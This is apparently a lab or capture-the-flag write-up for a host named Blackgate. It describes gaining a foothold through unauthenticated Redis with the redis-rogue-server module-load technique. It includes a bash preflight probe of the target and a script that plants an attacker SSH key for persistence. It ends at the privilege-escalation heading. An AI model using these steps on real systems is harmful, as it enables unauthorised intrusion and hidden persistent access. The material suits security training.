Blackgate
Initial Foothold
After an initial nmap scan, the only services that were listening on the target host were SSH and Redis:
This version of Redis is vulnerable to remote command execution: it accepts commands without authentication, and Redis builds from 4.0 onward can load an arbitrary shared object as a module with MODULE LOAD, which is the feature the rogue-server technique abuses:

After using the redis-rogue-server tool, which starts an attacker-controlled Redis master, points the target at it with SLAVEOF, and delivers a malicious module through the replication stream for the target to load with MODULE LOAD, we obtained a reverse shell as the user prudence:
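Before firing redis-rogue-server it is worth confirming the two conditions it depends on: the instance answers without AUTH, and the MODULE command is still reachable (Redis 7 disables it by default with enable-module-command, and hardened builds rename it). The script below is an added example, not part of the original writeup or of the redis-rogue-server project. It hand-encodes the RESP framing redis-cli uses, classifies the first reply line to PING and MODULE LIST, and optionally runs the live probe over bash's /dev/tcp; the host and port are placeholders.

```shell
#!/usr/bin/env bash
# Added example (not from the original writeup): pre-flight check for the
# conditions the rogue-master / MODULE LOAD technique needs.
# Host and port passed on the command line are assumptions for illustration.
LC_ALL=C
CR=$(printf '\r')

# Encode a command in RESP, the wire framing redis-cli and the rogue server use:
#   *<argc>\r\n then, per argument, $<len>\r\n<bytes>\r\n
resp_encode() {
  printf '*%d\r\n' "$#"
  for arg in "$@"; do
    printf '$%d\r\n%s\r\n' "${#arg}" "$arg"
  done
}

# Classify the first reply line to PING ($1) and to MODULE LIST ($2).
# Prints a verdict; returns 0 only when the rogue-master path looks open.
classify_redis() {
  case $1 in
    -NOAUTH*) echo auth-required;  return 1 ;;
    -DENIED*) echo protected-mode; return 1 ;;   # non-loopback bind, no password set
    +PONG)    ;;
    *)        echo not-redis;      return 2 ;;
  esac
  case $2 in
    \**)                 echo module-load-reachable;   return 0 ;;   # array reply: MODULE works
    -ERR*"not allowed"*) echo module-command-disabled; return 1 ;;   # Redis 7 enable-module-command
    -ERR*unknown*)       echo module-command-renamed;  return 1 ;;   # rename-command or old build
    *)                   echo unexpected-reply;        return 2 ;;
  esac
}

# Live probe: needs bash for /dev/tcp. Not exercised offline.
probe_redis() {
  host=$1; port=${2:-6379}
  exec 3<>"/dev/tcp/$host/$port" || return 2
  resp_encode PING >&3
  IFS= read -r ping <&3
  resp_encode MODULE LIST >&3
  IFS= read -r mod <&3
  resp_encode QUIT >&3
  exec 3>&-
  classify_redis "${ping%"$CR"}" "${mod%"$CR"}"
}

# Usage: ./redis_preflight.sh <host> [port]
if [ $# -ge 1 ]; then
  probe_redis "$@"
fi
```

A module-load-reachable verdict means the target will run whatever shared object it is told to load; the remaining prerequisite is that SLAVEOF/REPLICAOF has not been renamed, and that the target can reach the attacker-controlled master on the port the rogue server listens on.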

For persistence and to get a proper interactive shell, I created a new public/private key pair with ssh-keygen, then created the file /home/prudence/.ssh/authorized_keys on the target host and added the new public key to it. Two things to keep in mind here: sshd's StrictModes expects ~/.ssh to be mode 700 and authorized_keys mode 600 (and the home directory not to be group/world-writable), and redirecting with > overwrites any keys the user already had, so >> is the safer choice:
prudence@blackgate:/tmp$ mkdir /home/prudence/.ssh
prudence@blackgate:/tmp$ echo "INSERT PUBLIC KEY HERE" > /home/prudence/.ssh/authorized_keys
After this, I was able to achieve an SSH session using the new identity file:
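The same key installation, written as a function that appends rather than overwrites, is idempotent, and sets the permissions sshd requires. This is an added example and not part of the original writeup; the key-pair path, the sample key string and the home directory it is run against are placeholders.

```shell
#!/usr/bin/env bash
# Added example (not from the original writeup): install an SSH public key
# for persistence the way sshd's StrictModes expects. Paths and the sample
# key used when testing are assumptions / constructed values.

# Print a file's octal mode (GNU stat, falling back to BSD stat).
perm_of() {
  stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"
}

# gen_key <path> <comment>: attacker side, ed25519 key with no passphrase.
gen_key() {
  ssh-keygen -t ed25519 -N '' -f "$1" -C "$2"
}

# install_authorized_key <home_dir> "<ssh-ed25519 AAAA... comment>"
# Appends the key once, fixes permissions, prints the resulting key count.
install_authorized_key() {
  home=$1; key=$2
  sshdir="$home/.ssh"; akf="$sshdir/authorized_keys"
  mkdir -p "$sshdir" && chmod 700 "$sshdir"
  [ -f "$akf" ] || : > "$akf"
  chmod 600 "$akf"
  # Exact-line match so re-running does not duplicate the key.
  if ! grep -qxF "$key" "$akf"; then
    printf '%s\n' "$key" >> "$akf"
  fi
  # sshd (StrictModes yes) ignores the file if home is group/world-writable:
  # the last two mode digits must not carry the write bit (2, 3, 6 or 7).
  case $(perm_of "$home") in
    *[0145][0145]) ;;
    *) echo "warning: $home is group/world-writable; StrictModes will reject the key" >&2 ;;
  esac
  wc -l < "$akf" | tr -d ' '
}

# Usage on the target: ./install_key.sh /home/prudence "$(cat id_ed25519.pub)"
# Then from the attacker host: ssh -i id_ed25519 prudence@<target>
if [ $# -ge 2 ]; then
  install_authorized_key "$1" "$2"
fi
```

If the login still fails, check /etc/ssh/sshd_config for PubkeyAuthentication and a non-default AuthorizedKeysFile, and remember that an unexpected line in a user's authorized_keys is one of the first things an incident responder looks for, so note what you added and remove it when the engagement ends.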
Privilege Escalation